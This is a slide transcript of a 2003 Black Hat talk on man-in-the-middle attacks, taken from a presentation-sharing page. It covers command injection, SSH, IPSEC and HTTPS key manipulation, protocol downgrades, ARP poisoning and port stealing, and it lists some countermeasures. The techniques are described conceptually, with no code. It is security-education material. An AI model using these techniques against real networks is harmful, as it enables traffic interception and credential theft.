1 / 35

Man in the middle attacks Demos

Alberto Ornaghi <alor@antifork.org> Marco Valleri <naga@antifork.org>. Man in the middle attacks Demos. The scenario. Server. Attacker. Client. Once in the middle…. Injection Key Manipulation Downgrade attack Filtering. Injecting.

terin
Télécharger la présentation

Man in the middle attacks Demos

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Alberto Ornaghi <alor@antifork.org> Marco Valleri <naga@antifork.org> Man in the middle attacksDemos Blackhat Conference - USA 2003

  2. The scenario Server Attacker Client Blackhat Conference - USA 2003

  3. Once in the middle… • Injection • Key Manipulation • Downgrade attack • Filtering Blackhat Conference - USA 2003

  4. Injecting • Possibility to add packets to an already established connection (only possible in full-duplex mitm) • The attacker can modify the sequence numbers and keep the connection synchronized while injecting packets. • If the mitm attack is a “proxy attack” it is even easier to inject (there are two distinct connections) Blackhat Conference - USA 2003

  5. Injecting Command injection • Useful in scenarios where a one time authentication is used (e.g. RSA token).In such scenarios sniffing the password is useless, but hijacking an already authenticated session is critical • Injection of commands to the server • Emulation of fake replies to the client Blackhat Conference - USA 2003

  6. Command InjectionDEMO Blackhat Conference - USA 2003

  7. Key Manipulation • SSH v1 • IPSEC • HTTPS Blackhat Conference - USA 2003

  8. start MITM Server Client KEY(rsa) KEY(rsa) Ekey[S-Key] Ekey[S-Key] D(E(M)) Eskey(M) D(E(M)) Key Manipulation SSH v1 • Modification of the public key exchanged by server and client. S-KEY S-KEY S-KEY M Blackhat Conference - USA 2003

  9. SSH v1 AttackDEMO Blackhat Conference - USA 2003

  10. Diffie-Hellman exchange 1 – Authenticated by pre-shared secret Diffie-Hellman exchange 2 – Authenticated by pre-shared secret De-Crypt Packet Re-Crypt Packet Key Manipulation IPSEC If two or more clients share the same “secret”, each of them can impersonate the server with another client. Client MiM Server Blackhat Conference - USA 2003

  11. Real Connection to the server Fake cert. Client Key Manipulation HTTPS We can create a fake certificate (eg: issued by VerySign) relying on browser misconfiguration or user dumbness. MiM Server Blackhat Conference - USA 2003

  12. HTTPS AttackDEMO Blackhat Conference - USA 2003

  13. Filtering • The attacker can modify the payload of the packets by recalculating the checksum • He/she can create filters on the fly • The length of the payload can also be changed but only in full-duplex (in this case the seq has to be adjusted) Blackhat Conference - USA 2003

  14. Filtering Code Filtering / Injection • Insertion of malicious code into web pages or mail (javascript, trojans, virus, ecc) • Modification on the fly of binary files during the download phase (virus, backdoor, ecc) Blackhat Conference - USA 2003

  15. Binary ModificationDEMO Blackhat Conference - USA 2003

  16. Change form destination to http://attacker Http main page with https login form Http post (login\password) Auto-submitting hidden form with right authentication data Real https authentication post Authenticated connection Filtering HTTPS redirection Let’s see an example MiM Server Client login password Blackhat Conference - USA 2003

  17. HTTPS Redirection AttackDEMO Blackhat Conference - USA 2003

  18. Downgrade Attacks • SSH v2 • IPSEC • PPTP Blackhat Conference - USA 2003

  19. Downgrade Attacks SSH v2  v1 • Parameters exchanged by server and client can be substituted in the beginning of a connection. (algorithms to be used later) • The attacker can force the client to initialize a SSH1 connection instead of SSH2. • The server replies in this way: • SSH-1.99 -- the server supports ssh1 and ssh2 • SSH-1.51 -- the server supports ONLY ssh1 • The attacker makes a filter to replace “1.99” with “1.51” • Possibility to circumvent known_hosts Blackhat Conference - USA 2003

  20. SSH v2 DowngradeDEMO Blackhat Conference - USA 2003

  21. Downgrade Attacks IPSEC Failure • Block the keymaterial exchanged on the port 500 UDP • End points think that the other cannot start an IPSEC connection • If the client is configured in rollback mode, there is a good chance that the user will not notice that the connection is in clear text Blackhat Conference - USA 2003

  22. Downgrade Attacks PPTP attack (1) • During negotiation phase • Force PAP authentication (almost fails) • Force MS-CHAPv1 from MS-CHAPv2 (easier to crack) • Force no encryption • Force re-negotiation (clear text terminate-ack) • Retrieve passwords from existing tunnels • Perform previous attacks • Force “password change” to obtain password hashes • Hashes can be used directly by a modified SMB or PPTP client • MS-CHAPv2 hashes are not usefull (you can force v1) Blackhat Conference - USA 2003

  23. req | auth | chap nak | auth | pap req | auth | pap ack | auth | pap req | auth | fake nak| auth | chap req | auth | pap ack | auth | pap start Server Client Downgrade Attacks PPTP attack (2) Force PAP from CHAP MITM We don’t have to mess with GRE sequences... Blackhat Conference - USA 2003

  24. Downgrade Attacks L2TP rollback • L2TP can use IPSec ESP as transport layer (stronger than PPTP) • By default L2TP is tried before PPTP • Blocking ISAKMP packets results in an IPSec failure • Client starts a request for a PPTP tunnel (rollback) • Now you can perform PPTP previous attacks Blackhat Conference - USA 2003

  25. PPTP AttackDEMO Blackhat Conference - USA 2003

  26. MITM attacks Different attacks in different scenarios: LOCAL AREA NETWORK: - ARP poisoning - DNS spoofing - STP mangling - Port stealing FROM LOCAL TO REMOTE (through a gateway): - ARP poisoning - DNS spoofing - DHCP spoofing - ICMP redirection - IRDP spoofing - route mangling REMOTE: - DNS poisoning - traffic tunneling - route manglingWIRELESS: - Access Point Reassociation Blackhat Conference - USA 2003

  27. MITM attacksARP poisoning • ARP is stateless (we all knows how it works and what the problems are) • Some operating systems do not update an entry if it is not already in the cache, others accept only the first received reply (e.g solaris) • The attacker can forge a spoofed ICMP packets to force the host to make an ARP request. Immediately after the ICMP it sends the fake ARP replay • Usefull on switched lan (the switch will not notice the attack) Blackhat Conference - USA 2003

  28. MITM attacksARP poisoning- countermeasures • YES - passive monitoring (arpwatch) • YES - active monitoring (ettercap) • YES - IDS (detect but not avoid) • YES - Static ARP entries (avoid it) • YES - Secure-ARP (public key auth) • NO - Port security on the switch • NO - anticap, antidote, middleware approach Blackhat Conference - USA 2003

  29. ARP PoisoningDEMO(all we have done until now…) Blackhat Conference - USA 2003

  30. ARP Poisoning Antidote Kernel Patch • http://www.securityfocus.com/archive/1/299929 • “Kernel will send ARP request to test if there is a host at old MAC address. If such response is received it lets us know than one IP pretends to have several MAC addresses at one moment, that probably caused by ARP spoof attack.” • We can fake this protection if the ARP entry is not in the cache and the real mac address will be banned Blackhat Conference - USA 2003

  31. Antidote AttackDEMO Blackhat Conference - USA 2003

  32. MITM attackPort stealing • The attacker sends many layer 2 packets with: • Source address equal to victim hosts’ address • Destination address equal to its own mac address • The attacker now has “stolen” victim hosts’ ports • When the attacker receives a packet for one of the victims it generates a broadcast ARP request for the victim’s IP address. • When the attacker receives the ARP reply from the victim, the victim’s port has been restored to the original binding state • The attacker can now forward the packet and restart the stealing process • Possibility to circumvent static-mapped arp entries Blackhat Conference - USA 2003

  33. MITM attackPort stealing - countermeasures • YES - port security on the switch • NO - static ARP Blackhat Conference - USA 2003

  34. Port StealingDEMO Blackhat Conference - USA 2003

  35. Q & A Alberto Ornaghi <alor@antifork.org> Marco Valleri <naga@antifork.org> Blackhat Conference - USA 2003

More Related